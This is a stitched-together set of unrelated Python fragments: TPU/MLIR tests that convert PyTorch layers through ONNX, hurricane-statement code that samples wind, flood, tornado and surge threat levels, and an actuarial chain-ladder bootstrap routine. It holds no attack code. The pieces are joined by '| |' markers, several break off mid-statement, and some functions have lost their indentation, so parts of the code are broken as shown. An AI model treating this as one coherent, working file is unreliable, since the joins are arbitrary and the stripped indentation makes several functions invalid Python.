        ret = mlir_quant(fp32_opt_mlir, quant_mlir, chip,
                         bf16_csv, quantize="bf16")
        if ret < 0: raise RuntimeError("tpu_quant failed")
        # get mlir output
        del self.mlir_model
        self.mlir_model = MLIRModel()
        self.mlir_model.load_model(quant_mlir)
        mlir_bf16_outs = self.mlir_model.inference(input_data)
        assert(len(mlir_bf16_outs) == num_outputs)
        bf16_tensors = self.mlir_model.get_all_tensor()
        ref_npz = "{}_all_tensor_bf16_mlir.npz".format(model_name)
        np.savez(ref_npz, **bf16_tensors)
        npz_compare([ref_npz, mlir_npz, "--tolerance",
                     "0.8,0.8,0.8", "--dequant", "--op_info", bf16_csv])
        # gen cvimodel
        cvimodel = "{}_bf16.cvimodel".format(model_name)
        ret = mlir_to_cvimodel(quant_mlir, cvimodel, inputs_type="SAME", outputs_type="FP32")
        if ret < 0: raise RuntimeError("gen_cvimodel failed")
        # run cvi_model
        output_tensor_npz = "{}_all_tensor_bf16_cvi.npz".format(model_name)
        cvi_outs = cvimodel_inference(bf16_tensors, cvimodel)
        assert(len(cvi_outs) == num_outputs)
        for name in cvi_outs:
            if name not in bf16_tensors:
                raise RuntimeError("cvimodel output name not correct")
        np.savez(output_tensor_npz, **cvi_outs)
        npz_compare([output_tensor_npz, ref_npz, "--op_info", bf16_csv, "--tolerance", "0.9,0.9,0.90", "-vv"])
    del self.mlir_model
def pytorch_transform_onnx(self, model, inputs, test_name):
in_names = []
if isinstance(inputs, tuple):
for i in range(len(inputs)):
in_names.append("in_{}".format(i))
else:
in_names = ["in_0"]
torch.onnx.export(model,
inputs,
test_name + ".onnx",
export_params=True,
opset_version=11,
verbose=True,
input_names=in_names)
def test_LSTM(self):
    """Bidirectional LSTM: export to ONNX and run the full conversion pipeline."""
    class Net(torch.nn.Module):
        def __init__(self):
            super(Net, self).__init__()
            self.rnn = nn.LSTM(input_size=100, hidden_size=128, bidirectional=True)

        def forward(self, x, h_0, c_0):
            Y, (Y_h, Y_c) = self.rnn(x, (h_0, c_0))
            return Y, Y_h, Y_c

    test_name = 'LSTM'
    seq = torch.randn(81, 1, 100)
    hidden = torch.randn(2, 1, 128)
    cell = torch.randn(2, 1, 128)
    net = Net()
    outputs = net(seq, hidden, cell)
    inputs = (seq, hidden, cell)
    # Export via torch's onnx exporter, then cross-check every stage.
    self.pytorch_transform_onnx(net, inputs, test_name)
    self.onnx_convert_and_infernece(inputs, test_name, outputs)
def test_Bilinear(self):
    """nn.Bilinear on two inputs: export to ONNX and run the conversion pipeline."""
    class Net(torch.nn.Module):
        def __init__(self):
            super(Net, self).__init__()
            self.Bilinear = nn.Bilinear(20, 30, 40)

        def forward(self, x, y):
            # (100, 20) x (100, 30) -> (100, 40)
            return self.Bilinear(x, y)

    test_name = 'Bilinear'
    rows, left_feats, right_feats = 100, 20, 30
    input_data = {
        'input': torch.randn(rows, left_feats),
        'input1': torch.randn(rows, right_feats),
    }
    net = Net()
    torch_output_data = net(input_data['input'], input_data['input1'])
    # Export via torch's onnx exporter, then cross-check every stage.
    self.pytorch_transform_onnx(net, input_data, test_name)
    self.onnx_convert_and_infernece(input_data, test_name, torch_output_data)
def test_Log(self):
    """torch.log on inputs clamped to [8, 10]: export and convert."""
    class Net(torch.nn.Module):
        def __init__(self):
            super(Net, self).__init__()

        def forward(self, x):
            return torch.log(x)

    test_name = 'Log'
    input_shape = [1, 3, 100, 100]
    net = Net()
    # Clamp keeps inputs strictly positive so log() is well defined.
    input_data = torch.clamp(torch.randn(*input_shape), 8.0, 10.0)
    torch_output_data = net(input_data)
    self.pytorch_transform_onnx(net, input_data, test_name)
    torch_output_data = torch_output_data.data.numpy()
    self.onnx_convert_and_infernece(input_data, test_name, torch_output_data)
def test_LogSigmoid(self):
    """Linear + LogSigmoid: export to ONNX and run the conversion pipeline."""
    class Net(torch.nn.Module):
        def __init__(self):
            super(Net, self).__init__()
            self.linear = nn.Linear(100, 200, bias=False)
            self.act = nn.LogSigmoid()

        def forward(self, x):
            return self.act(self.linear(x))

    test_name = 'LogSigmoid'
    input_shape = [3, 100, 100]
    net = Net()
    input_data = torch.randn(input_shape)
    torch_output_data = net(input_data)
    self.pytorch_transform_onnx(net, input_data, test_name)
    torch_output_data = torch_output_data.data.numpy()
    self.onnx_convert_and_infernece(input_data, test_name, torch_output_data)
def test_LogSoftmax(self):
class Net(torch.nn.Module):
def __init__(self):
super(Net, self).__init__()
self.linear = nn.Linear(32, 72, bias=False)
self.act = nn.LogSoftmax(dim = 2)
def forward(self, x):
x = self.linear(x)
x | |
maxThreat):
import TCVDictionary
potentialImpactStatements = TCVDictionary.PotentialImpactStatements
statements = potentialImpactStatements[elementName][maxThreat]
return statements
def _impactCategoryToThreatLevel(self, impactCategory):
if impactCategory == "catastrophic" or impactCategory == "devastating":
return "Extreme"
elif impactCategory == "extensive":
return "High"
elif impactCategory == "significant":
return "Mod"
elif impactCategory == "limited":
return "Elevated"
else:
return "None"
def _determineHazardStates(self):
self._currentHazardsList = []
self._changesHazardsList = []
self.debug_print("*"*80)
keys = self._previousAdvisory.keys()
keys.sort()
for key in keys:
self.debug_print("%s : %s" % (key, self._previousAdvisory[key]), 1)
for hazard in self._previousAdvisory["HazardsForHLS"]:
self.debug_print("DEBUG Hazard: %s" % (self._pp.pformat(hazard)), 1)
if hazard['act'] != 'CON':
self._changesHazardsList.append(hazard)
if hazard['act'] not in ['CAN', "UPG"]:
self._currentHazardsList.append(hazard)
self.debug_print("-"*80, 1)
self.debug_print("self._changesHazardsList = %s" % (self._changesHazardsList), 1)
self.debug_print("self._currentHazardsList = %s" % (self._currentHazardsList), 1)
###############################################################
### Sampling and Statistics related methods
def _sampleHLSData(self, argDict):
    """Sample the grids needed for the HLS product and update self._samplingDict.

    Three passes are made: (1) CWA-wide ranked threat sampling, (2) whole-domain
    wind sampling, (3) storm-surge sampling over the CWA/surge intersection.
    For each threat the strongest deciding value seen across all periods is
    retained in self._samplingDict[threat]['decidingField'].
    """
    # Pass 1: sample threat grids over the forecaster's CWA.
    editAreas = [(self._cwa(), self._cwa())]
    cwaSampler = self.getSampler(argDict,
                                 (self._analysisList_HLS(), self._timeRangeList3Hour, editAreas))
    statList = self.getStatList(cwaSampler,
                                self._analysisList_HLS(),
                                self._timeRangeList3Hour,
                                self._cwa())
    for period in range(len(statList)):
        self.debug_print("=" * 100, 1)
        self.debug_print("In _sampleHLSData for period %s (%s)" % \
                         (period, self._timeRangeList3Hour[period][0]), 1)
        statDict = statList[period]
        for threatName in ['WindThreat', 'FloodingRainThreat', 'TornadoThreat']:
            self._sampleRankedDiscreteValue(threatName, statDict)
            # TODO: Investigate if this sampling method is still really needed. The JSON files may
            # have all the needed information now
            self._sampleMostSignificantDiscreteValue(threatName, statDict)
        # Track the worst QPF/FFG ratio seen so far for the flooding-rain threat.
        qpfToFfgRatio = self._getStatValue(statDict, "QPFtoFFGRatio", "Max")
        decidingField = self._samplingDict['FloodingRainThreat']['decidingField']
        if decidingField is None or qpfToFfgRatio > decidingField:
            self._samplingDict['FloodingRainThreat']['decidingField'] = qpfToFfgRatio
    self.debug_print("WindThreat = %s" % (self._samplingDict['WindThreat']['inputThreatDominant']), 1)
    self.debug_print("FloodingRainThreat = %s" % (self._samplingDict['FloodingRainThreat']['inputThreatDominant']), 1)
    self.debug_print("TornadoThreat = %s" % (self._samplingDict['TornadoThreat']['inputThreatDominant']), 1)

    # Pass 2: sample the maximum wind over the whole domain.
    self._createWholeDomainEditArea(argDict)
    editAreas = [("WholeDomain", "WholeDomain")]
    wholeDomainSampler = self.getSampler(argDict,
                                         (self._analysisList_HLS_WholeDomain(), self._timeRangeList3Hour, editAreas))
    statList = self.getStatList(wholeDomainSampler,
                                self._analysisList_HLS_WholeDomain(),
                                self._timeRangeList3Hour,
                                "WholeDomain")
    for period in range(len(statList)):
        statDict = statList[period]
        maxWind = self._getStatValue(statDict, "Wind", "Max", self.VECTOR())
        decidingField = self._samplingDict['WindThreat']['decidingField']
        if decidingField is None or maxWind > decidingField:
            self._samplingDict['WindThreat']['decidingField'] = maxWind

    # Pass 3: storm surge is sampled only where the CWA intersects surge areas.
    editAreas = [(self._cwa(), self._cwa())]
    intersectAreas = self._computeIntersectAreas(editAreas, argDict)
    if len(intersectAreas) != 0:
        self.debug_print("Sampling StormSurgeThreat, now")
        intersectSampler = self.getSampler(argDict,
                                           (self._intersectAnalysisList_HLS(), self._timeRangeList3Hour, intersectAreas))
        statList = self.getStatList(intersectSampler,
                                    self._intersectAnalysisList_HLS(),
                                    self._timeRangeList3Hour,
                                    "intersect_" + self._cwa())
        for period in range(len(statList)):
            statDict = statList[period]
            self.debug_print("current stormSurge statDict = %s" % (self._pp.pformat(statDict)), 1)
            self._sampleRankedDiscreteValue('StormSurgeThreat', statDict)
            inundationMax = self._getStatValue(statDict, "InundationMax", "Max")
            decidingField = self._samplingDict['StormSurgeThreat']['decidingField']
            if decidingField is None or inundationMax > decidingField:
                self._samplingDict['StormSurgeThreat']['decidingField'] = inundationMax
        self.debug_print("StormSurgeThreat = %s" % (self._samplingDict['StormSurgeThreat']['inputThreatDominant']), 1)
def _sampleTCVAdvisory(self, advisory):
    """Fold the threat levels recorded in a previous TCV advisory into
    self._samplingDict.

    For every zone in advisory["ZoneData"], each "*Threat" key (except the
    "highestHunkerDown" bookkeeping keys) updates the running
    inputThreatLow/inputThreatHigh extremes for that threat.
    """
    self.debug_print("sampling TCV advisory!", 1)
    # Per threat key: has any non-None level been seen yet? Until then a
    # zone's (possibly None) level is allowed to seed both extremes.
    seenValidThreatLevel = {}
    for zone in advisory["ZoneData"]:
        self.debug_print("-" * 60, 1)
        self.debug_print("Looking at zone %s" % (zone), 1)
        for key in advisory["ZoneData"][zone]:
            # Only the *Threat entries are sampled; skip bookkeeping keys.
            if "Threat" not in key or "highestHunkerDown" in key:
                continue
            if key not in seenValidThreatLevel:
                seenValidThreatLevel[key] = False
            self.debug_print("Looking at key '%s'" % (key), 1)
            threatLevel = advisory["ZoneData"][zone][key]
            self.debug_print("  Threat level = %s" % (threatLevel), 1)
            # Seed the extremes with the first level encountered (even None)
            # so the index comparisons below have a starting point.
            if (self._samplingDict[key]['inputThreatLow'] is None) and (not seenValidThreatLevel[key]):
                self._samplingDict[key]['inputThreatLow'] = threatLevel
            if (self._samplingDict[key]['inputThreatHigh'] is None) and (not seenValidThreatLevel[key]):
                self._samplingDict[key]['inputThreatHigh'] = threatLevel
            if threatLevel != None:
                seenValidThreatLevel[key] = True
            lowThreat = self._samplingDict[key]['inputThreatLow']
            highThreat = self._samplingDict[key]['inputThreatHigh']
            # Rank levels by their position in the key-order list for this
            # threat. NOTE(review): threatOrder.index(...) assumes both
            # threatLevel and the seeded extremes (which may be None) occur
            # in the order list — confirm mostSignificantDiscrete_keyOrder_dict
            # includes the None entry.
            threatOrder = self.mostSignificantDiscrete_keyOrder_dict(None, None, None)[key]
            self.debug_print("***** threatOrder = %s" % (repr(threatOrder)), 1)
            if threatOrder.index(threatLevel) < threatOrder.index(lowThreat):
                lowThreat = threatLevel
            if threatOrder.index(threatLevel) > threatOrder.index(highThreat):
                highThreat = threatLevel
            if lowThreat is None:
                self.debug_print("  low threat = Python None", 1)
            else:
                self.debug_print("  low threat = %s" % (lowThreat), 1)
            self.debug_print("  high threat = %s" % (highThreat), 1)
            self._samplingDict[key]['inputThreatLow'] = lowThreat
            self._samplingDict[key]['inputThreatHigh'] = highThreat
    self.debug_print("Sampling dict =\n\n%s\n" % (self._pp.pformat(self._samplingDict)), 1)
def _sampleRankedDiscreteValue(self, threatName, statDict):
self.debug_print("-" * 60, 1)
self.debug_print("_sampleRankedDiscreteValue statDict =\n\n%s\n" % (self._pp.pformat(statDict)), 1)
rankedThreatLevels = self.getStats(statDict, threatName + "__rankedDiscreteValue")
self.debug_print("sampling %s" % (threatName), 1)
self.debug_print("sampleData: rankedThreatLevels =\n\n%s\n" % (self._pp.pformat(rankedThreatLevels)), 1)
if rankedThreatLevels is not None:
dominantThreatLevel = self._getDominantThreatLevel(threatName, rankedThreatLevels)
self.debug_print("dominantThreatLevel = %s" % (dominantThreatLevel), 1)
currentDominantThreatLevel = self._samplingDict[threatName]['inputThreatDominant']
self.debug_print("currentDominantThreatLevel = %s" % (currentDominantThreatLevel), 1)
self._samplingDict[threatName]['inputThreatDominant'] = self._getHighestThreat(threatName,
dominantThreatLevel,
currentDominantThreatLevel)
self.debug_print("new dominant = %s" % (self._samplingDict[threatName]['inputThreatDominant']), 1)
def _sampleMostSignificantDiscreteValue(self, threatName, statDict):
self.debug_print("_sampleMostSignificantDiscreteValue for %s" % (threatName), 1)
threatLevel = self.getStats(statDict, threatName + "__mostSignificantDiscreteValue")
self.debug_print("threatLevel = %s" % (threatLevel), 1)
if threatLevel is not None:
inputThreatLow = self._samplingDict[threatName]['inputThreatLow']
self.debug_print("current inputThreatLow = %s" % (inputThreatLow), 1)
if inputThreatLow is None:
self._samplingDict[threatName]['inputThreatLow'] = threatLevel
else:
self._samplingDict[threatName]['inputThreatLow'] = self._getLowestThreat(threatName,
threatLevel,
inputThreatLow)
self.debug_print("new inputThreatLow = %s" % (self._samplingDict[threatName]['inputThreatLow']), 1)
inputThreatHigh = self._samplingDict[threatName]['inputThreatHigh']
self.debug_print("current inputThreatHigh = %s" % (inputThreatHigh), 1)
self._samplingDict[threatName]['inputThreatHigh'] = self._getHighestThreat(threatName,
threatLevel,
inputThreatHigh)
self.debug_print("new inputThreatHigh = %s" % (self._samplingDict[threatName]['inputThreatHigh']), 1)
def _getDominantThreatLevel(self, threatName, rankedThreatLevels):
dominantLevelWithHighestRank = None
highestRank = None
for (level, rank) in rankedThreatLevels:
if highestRank is None or rank > highestRank:
highestRank = rank
dominantLevelWithHighestRank = level
elif rank == highestRank:
dominantLevelWithHighestRank = self._getHighestThreat(threatName,
dominantLevelWithHighestRank,
level)
return dominantLevelWithHighestRank
def _getHighestThreat(self, threatName, threatLevel1, threatLevel2):
keyOrderDict = self.mostSignificantDiscrete_keyOrder_dict(None, None, None)
keyOrder = keyOrderDict[threatName]
level1Index = keyOrder.index(threatLevel1)
level2Index = keyOrder.index(threatLevel2)
if level1Index < level2Index:
return threatLevel2
elif level1Index == level2Index:
return threatLevel1
else:
return threatLevel1
def _getLowestThreat(self, threatName, threatLevel1, threatLevel2):
keyOrderDict = self.mostSignificantDiscrete_keyOrder_dict(None, None, None)
keyOrder = keyOrderDict[threatName]
level1Index = keyOrder.index(threatLevel1)
level2Index = keyOrder.index(threatLevel2)
if level1Index < level2Index:
return threatLevel1
elif level1Index == level2Index:
return threatLevel1
else:
return threatLevel2
def _setHazardImpactCategories(self, threatName):
inputThreatLow = self._samplingDict[threatName]['inputThreatLow']
inputThreatHigh = self._samplingDict[threatName]['inputThreatHigh']
inputThreatDominant = self._samplingDict[threatName]['inputThreatDominant']
decidingField = self._samplingDict[threatName]['decidingField']
catastrophicThreshold = self._samplingDict[threatName]['catastrophicThreshold']
self.debug_print("-" * 60, 1)
self.debug_print("DEBUG: _setHazardImpactCategories for %s" % (threatName), 1)
impactMin = None
impactMax = None
impactRange = None
impactRangeMax = None
# Determine lowest impact category
if inputThreatLow == "Extreme":
if threatName != "TornadoThreat" and decidingField >= catastrophicThreshold:
impactMin = "catastrophic"
else:
impactMin = "devastating"
elif inputThreatLow == "High":
impactMin = "extensive"
elif inputThreatLow == "Mod":
impactMin = "significant"
elif inputThreatLow == "Elevated":
impactMin = "limited"
else:
impactMin = "none"
# Determine highest impact category
if inputThreatHigh == "Extreme":
if threatName != "TornadoThreat" and decidingField >= catastrophicThreshold:
impactMax = "catastrophic"
impactRangeMax = "devastating"
else:
impactMax = "devastating"
impactRangeMax = "extensive"
elif inputThreatHigh == "High":
impactMax = "extensive"
impactRangeMax = "significant"
elif inputThreatHigh == "Mod":
impactMax = "significant"
impactRangeMax = "limited"
elif inputThreatHigh == "Elevated":
impactMax = "limited"
impactRangeMax = "none"
else:
impactMax = "none"
impactRangeMax = "none"
self.debug_print(
"DEBUG: impactMin = '%s' impactMax = '%s' impactRangeMax = '%s'" % \
(impactMin, impactMax, impactRangeMax), 1)
# Determine dominant impact category for rest of CWA - No impact
if impactMin == "none" and impactMax == "none":
impactRange = "Little to no " + self._frame("additional") + " impacts are anticipated at this time across " + self._cwa_descriptor() + "."
# Otherwise, at least some impact will be experienced across the CWA
else:
# Do not permit the lowest category to be "None", if the highest category is also not "None"
# This is to avoid poor impact range wording in situations of tight gradients across a CWA
# (e.g. "None to High")
if impactMin == "none" and impactMax != "none":
impactMin = "limited"
if impactMin == impactMax:
impactRange = impactMax
impactRangeMax = impactMax
elif impactMin == impactRangeMax:
impactRange = impactRangeMax
else:
impactRange = impactMin + " to " + impactRangeMax
self._samplingDict[threatName]['impactMin'] = impactMin
self._samplingDict[threatName]['impactMax'] = impactMax
self._samplingDict[threatName]['impactRange'] = impactRange
self._samplingDict[threatName]['impactRangeMax'] = impactRangeMax
###############################################################
### Area, Zone and Segment related methods
def _createWholeDomainEditArea(self, argDict):
    """Create and persist a "WholeDomain" edit area whose mask covers
    every grid point of the current grid location.
    """
    utils = EditAreaUtils.EditAreaUtils()
    utils.setUp(None, argDict)
    loc = utils.getGridLoc()
    # Build an all-ones bit mask sized to the grid.
    mask = JavaGrid2DBit(loc.gridSize().x, loc.gridSize().y)
    mask.setAllValues(1)
    area = ReferenceData(loc, ReferenceID("WholeDomain"), mask)
    utils.saveEditAreas([area])
###############################################################
### Hazards related methods
def _determineHazards(self, segments):
# Return a list of hazards from the given segments in the form:
# (key, landList, marineList, coastalList, inlandList)
# where key is (hdln, act, phen, sig) and the lists show which areas
# contain the hazard separated by category
hazAreaList = []
for segment in segments:
hazardTable = self._argDict["hazards"]
hazards = hazardTable.getHazardList(segment)
for hazard in hazards:
action = hazard['act']
hazAreaList.append((hazard, segment))
# Consolidate hazards (there could be multiple segments with the same phen/sig/act)
hazardDict = {}
hazardList = []
for hazard, segment in hazAreaList:
key = (hazard['hdln'], hazard['act'], hazard['phen'], hazard['sig'])
if key not in hazardDict.keys():
hazardDict[key] = segment
hazardList.append(key)
else:
hazardDict[key] = hazardDict[key]+segment
self.debug_print("hazardList =\n\n%s\n" % (self._pp.pformat(hazardList)), 1)
return hazardList
###############################################################
### Time related methods
def _formatLocalTime(self, para, areas):
# Create a time string in local time
# e.g. 2 AM EDT
# Get the Z time hour
timeSearch = re.compile("...([0-9]+) *(Z|UTC)...")
timeStr = timeSearch.search(para)
## gmtStr = para[timeStr.start():timeStr.end()]
## gmt = gmtStr.strip("...").replace("Z","")
## gmtHour = int(gmt)/100
# This code could bomb in the unlikely | |
along the
latest diagonal.
Parameters
----------
sel: str
The ldf average to select from ``triangle._CumTriangle.a2a_avgs``.
Defaults to "all-weighted".
Returns
-------
pd.DataFrame
"""
ldfs = self._ldfs(sel=sel)
fitted_tri_cum = self.tri.copy(deep=True)
for ii in range(fitted_tri_cum.shape[0]):
iterrow = fitted_tri_cum.iloc[ii, :]
if iterrow.isnull().any():
# Find first NaN element in iterrow.
nan_hdr = iterrow.isnull()[iterrow.isnull()==True].index[0]
nan_idx = fitted_tri_cum.columns.tolist().index(nan_hdr)
init_idx = nan_idx - 1
else:
# If here, iterrow is the most mature exposure period.
init_idx = fitted_tri_cum.shape[1] - 1
# Set to NaN any development periods earlier than init_idx.
fitted_tri_cum.iloc[ii, :init_idx] = np.NaN
# Iterate over rows, undeveloping triangle from latest diagonal.
for j in range(fitted_tri_cum.iloc[ii, :init_idx].size, 0, -1):
prev_col_idx, curr_col_idx, curr_ldf_idx = j, j - 1, j - 1
prev_col_val = fitted_tri_cum.iloc[ii, prev_col_idx]
curr_ldf_val = ldfs.iloc[curr_ldf_idx]
fitted_tri_cum.iloc[ii, curr_col_idx] = (prev_col_val / curr_ldf_val)
return(fitted_tri_cum)
@staticmethod
def _tri_fit_incr(fitted_tri_cum):
"""
Return the fitted incremental triangle.
Parameters
----------
fitted_tri_cum: pd.DataFrame
Typically the output from ``self._tri_fit_cum``.
Returns
-------
pd.DataFrame
"""
tri = fitted_tri_cum.diff(axis=1)
tri.iloc[:, 0] = fitted_tri_cum.iloc[:, 0]
return(tri)
def _resid_us(self, fitted_tri_incr):
"""
Return unscaled Pearson residuals, given by
$r_{us} = \frac{I - m}{\sqrt{|m|}}$, where $r_{us}$ represents the
unscaled Pearson residuals, $I$ the actual incremental losses and $m$
the fitted incremental losses.
Parameters
----------
fitted_tri_incr: pd.DataFrame
Typically the output from ``self._tri_fit_incr``.
Returns
-------
pd.DataFrame
"""
# I represents actual incremental losses, m fitted incremental losses.
I = self.tri.to_incr()
m = fitted_tri_incr
return((I - m) / np.sqrt(m.abs()))
def _resid_adj(self, resid_us):
"""
Compute and return the adjusted Pearson residuals, given by
$r_{adj} = \sqrt{\frac{N}{dof}} * r_{us}$, where $r_adj$ represents
the adjusted Pearson residuals, $N$ the number of triangle cells,
$dof$ the degress of freedom and $r_{us}$ the unscaled Pearson
residuals.
Parameters
----------
resid_us: pd.DataFrame
Unscaled Pearson residuals, typically output by
``self._resid_us``.
Returns
-------
pd.DataFrame
"""
return(np.sqrt(self.tri.nbr_cells / self.dof) * resid_us)
@staticmethod
def _sampling_dist(resid_adj):
"""
Return ``resid_adj`` as a 1-dimensional array, which will be sampled
from with replacement in order to produce synthetic triangles for
bootstrapping. Any NaN's and 0's present in ``resid_adj`` will not be
present in the returned array.
Parameters
----------
resid_adj: pd.DataFrame
Adjusted Pearson residuals, typically output by
``self._resid_adj``.
Returns
-------
np.ndarray
"""
resid_ = resid_adj.iloc[:-1,:-1].values.ravel()
return(resid_[np.logical_and(~np.isnan(resid_), resid_!=0)])
def _bs_samples(self, sampling_dist, fitted_tri_incr, sims=1000,
                neg_handler="all", parametric=False, random_state=None):
    """
    Return DataFrame containing sims resampled-with-replacement
    incremental loss triangles if ``parametric=False``, otherwise
    random variates from a normal distribution with mean zero and
    variance derived from ``resid_adj``. Randomly generated incremental
    data gets cumulated in preparation for ldf calculation in next
    step.

    Parameters
    ----------
    sampling_dist: np.ndarray
        The residuals from the fitted incremental triangle coerced
        into a one-dimensional numpy array.

    fitted_tri_incr: pd.DataFrame
        The incremental triangle fitted using backwards recursion.
        Typically the output of ``self._tri_fit_incr``.

    sims: int
        The number of bootstrap simulations to run. Defaults to 1000.

    neg_handler: str
        If ``neg_handler="first"``, any first development period negative
        cells will be coerced to +1. If ``neg_handler="all"``, the minimum
        value in all triangle cells is identified (identified as 'MIN_CELL').
        If MIN_CELL is less than or equal to 0, (MIN_CELL + X = +1.0) is
        solved for X. X is then added to every other cell in the triangle,
        resulting in all triangle cells having a value strictly greater
        than 0.

    parametric: bool
        If True, fit standardized residuals to a normal distribution, and
        sample from the parameterized distribution. Otherwise, bootstrap
        procedure proceeds by sampling with replacement from the array
        of standardized residuals. Defaults to False.

    random_state: np.random.RandomState
        If int, random_state is the seed used by the random number
        generator; If RandomState instance, random_state is the random
        number generator; If None, the random number generator is the
        RandomState instance used by np.random.

    Returns
    -------
    pd.DataFrame

    Raises
    ------
    ValueError
        If ``neg_handler`` or ``random_state`` is of an unsupported kind.
    """
    # Normalize random_state into a RandomState instance up front. The
    # original branching left `prng` undefined (NameError at first use)
    # when random_state was neither None, an int, nor a RandomState.
    if random_state is None:
        prng = RandomState()
    elif isinstance(random_state, int):
        prng = RandomState(random_state)
    elif isinstance(random_state, RandomState):
        prng = random_state
    else:
        raise ValueError(
            "`random_state` must be None, an int or a RandomState instance.")
    sampling_dist = sampling_dist.flatten()
    fti = fitted_tri_incr.reset_index(drop=False).rename({"index":"origin"}, axis=1)
    dfm = pd.melt(fti, id_vars=["origin"], var_name="dev", value_name="value")
    # Builtin dtypes replace the np.int_/np.float_ aliases (np.float_ was
    # removed in NumPy 2.0); astype maps them to the same int64/float64.
    dfm = dfm[~np.isnan(dfm["value"])].astype(
        {"origin":int, "dev":int, "value":float}
    )
    # Handle first period negative cells as specified by `neg_handler`.
    if np.any(dfm["value"]<0):
        if neg_handler=="first":
            dfm["value"] = np.where(
                np.logical_and(dfm["dev"].values==1, dfm["value"].values<0),
                1., dfm["value"].values
            )
        elif neg_handler=="all":
            # Obtain reference to minimum triangle cell value, then
            # add the absolute value of that amount plus one to all
            # other triangle cells.
            add2cells = np.abs(dfm["value"].min()) + 1
            dfm["value"] = dfm["value"] + add2cells
        else:
            raise ValueError("`neg_handler` must be in ['first', 'all'].")
    dfi = self.tri.to_tbl(drop_nas=False).drop("value", axis=1)
    dfp = dfi.merge(dfm, how="outer", on=["origin", "dev"])
    # Cells absent from the melted actuals are future (forecast) cells.
    dfp["rectype"] = np.where(np.isnan(dfp["value"].values), "forecast", "actual")
    dfp = dfp.rename({"value":"incr"}, axis=1)
    dfp["incr_sqrt"] = np.sqrt(dfp["incr"].values)
    # np.int/np.float/np.str were removed from NumPy (>=1.24); the
    # builtins are the equivalent dtype specifications.
    dfrtypes = {"origin":int, "dev":int, "incr":float,
                "incr_sqrt":float, "rectype":str,}
    dfrcols = ["origin", "dev", "incr", "rectype", "incr_sqrt"]
    # Replicate dfp sims times then redefine datatypes.
    dfr = pd.DataFrame(np.tile(dfp, (sims, 1)), columns=dfrcols).astype(dfrtypes)
    # Assign simulation identifier to each record in dfr.
    dfr["sim"] = np.divmod(dfr.index, self.tri.shape[0] * self.tri.shape[1])[0]
    sample_size = dfr.shape[0]
    if parametric:
        # Sample random residuals from normal distribution with zero mean.
        dfr["resid"] = prng.normal(
            loc=0, scale=sampling_dist.std(ddof=1), size=sample_size
        )
    else:
        # Sample random residual from adjusted pearson residuals.
        dfr["resid"] = prng.choice(
            sampling_dist, sample_size, replace=True
        )
    # Calculate resampled incremental and cumulative losses
    # (np.NaN was removed in NumPy 2.0; np.nan is the canonical spelling).
    dfr["resid"] = np.where(dfr["rectype"].values=="forecast", np.nan, dfr["resid"].values)
    dfr = dfr.sort_values(by=["sim", "origin", "dev"]).reset_index(drop=True)
    dfr["samp_incr"] = dfr["incr"].values + dfr["resid"].values * dfr["incr_sqrt"].values
    dfr["samp_cum"] = dfr.groupby(["sim", "origin"], as_index=False)["samp_incr"].cumsum()
    return(dfr.reset_index(drop=True))
def _bs_ldfs(self, dfsamples):
    """
    Compute and return loss development factors for each set of
    synthetic loss data. This method is intended for internal use
    only.

    Parameters
    ----------
    dfsamples: pd.DataFrame
        Output from ``self._bs_samples``.

    Returns
    -------
    pd.DataFrame
    """
    keepcols = ["sim", "origin", "dev", "samp_cum", "last_origin"]
    # clvi maps each development period to the last origin that reaches it.
    dflvi = self.tri.clvi.reset_index(drop=False)
    dflvi = dflvi.rename(
        {"index":"dev", "origin":"last_origin", "row_offset":"origin_offset"}, axis=1)
    dfinit = dfsamples.merge(dflvi, how="left", on=["dev"])
    dfinit = dfinit[keepcols].sort_values(by=["sim", "dev", "origin"])
    df = dfinit[~np.isnan(dfinit["samp_cum"])].reset_index(drop=True)
    # Zero out each dev's last origin so the numerator and denominator of
    # the chain-ladder ratio aggregate over matching origin sets.
    df["_aggdev2"] = np.where(
        df["origin"].values==df["last_origin"].values, 0, df["samp_cum"].values)
    df2 = df.groupby(["sim", "dev"], as_index=False)[["samp_cum", "_aggdev2"]].sum().rename(
        {"samp_cum":"_aggdev1"}, axis=1)
    df2["_aggdev2"] = df2["_aggdev2"].shift(periods=1)
    df2["dev"] = df2["dev"].shift(periods=1)
    dfldfs = df2[df2["_aggdev2"]!=0].dropna(how="any")
    # np.int was removed from NumPy (>=1.24); the builtin int is the
    # equivalent dtype specification and avoids an AttributeError.
    dfldfs["dev"] = dfldfs["dev"].astype(int)
    dfldfs["ldf"] = dfldfs["_aggdev1"] / dfldfs["_aggdev2"]
    return(dfldfs[["sim", "dev", "ldf"]].reset_index(drop=True))
@staticmethod
def _bs_forecasts(dfcombined, scale_param):
    """
    Populate lower-right of each simulated triangle using values from
    ``self._bs_samples`` and development factors from ``self._bs_ldfs``.

    Parameters
    ----------
    dfcombined: pd.DataFrame
        Combination of ``self._bs_samples``, ``self._bs_ldfs`` and
        ``self.tri.latest_by_origin``.

    scale_param: float
        the sum of the squared unscaled Pearson residuals over the
        degrees of freedom. Computed within ``self._scale_param``.

    Returns
    -------
    pd.DataFrame
    """
    min_origin_year = dfcombined["origin"].values.min()
    # Tag cells at/after each origin's latest actual diagonal with their
    # own index label; earlier cells get -1 and are treated as actuals.
    dfcombined["_l_init_indx"] = np.where(
        dfcombined["dev"].values>=dfcombined["l_act_dev"].values, dfcombined.index.values, -1)
    dfacts = dfcombined[(dfcombined["origin"].values==min_origin_year) | (dfcombined["_l_init_indx"].values==-1)]
    dffcst = dfcombined[~dfcombined.index.isin(dfacts.index)].sort_values(by=["sim", "origin", "dev"])
    dffcst["_l_act_indx"] = dffcst.groupby(["sim", "origin"])["_l_init_indx"].transform("min")
    # DataFrame.lookup was removed in pandas 2.0; since the looked-up
    # column is fixed ("samp_cum"), a label-based Series selection over
    # the same row labels is equivalent.
    dffcst["l_act_cum"] = dffcst["samp_cum"].loc[dffcst["_l_act_indx"].values].to_numpy()
    # Develop each origin's latest actual forward with cumulated ldfs.
    dffcst["_cum_ldf"] = dffcst.groupby(["sim", "origin"])["ldf"].transform("cumprod").shift(periods=1)
    dffcst["_samp_cum2"] = dffcst["l_act_cum"].values * dffcst["_cum_ldf"].values
    dffcst["_samp_cum2"] = np.where(np.isnan(dffcst["_samp_cum2"].values), 0, dffcst["_samp_cum2"].values)
    dffcst["cum_final"] = np.where(np.isnan(dffcst["samp_cum"].values), 0, dffcst["samp_cum"].values) + dffcst["_samp_cum2"].values
    # Combine forecasts with actuals then compute incremental losses by sim and origin.
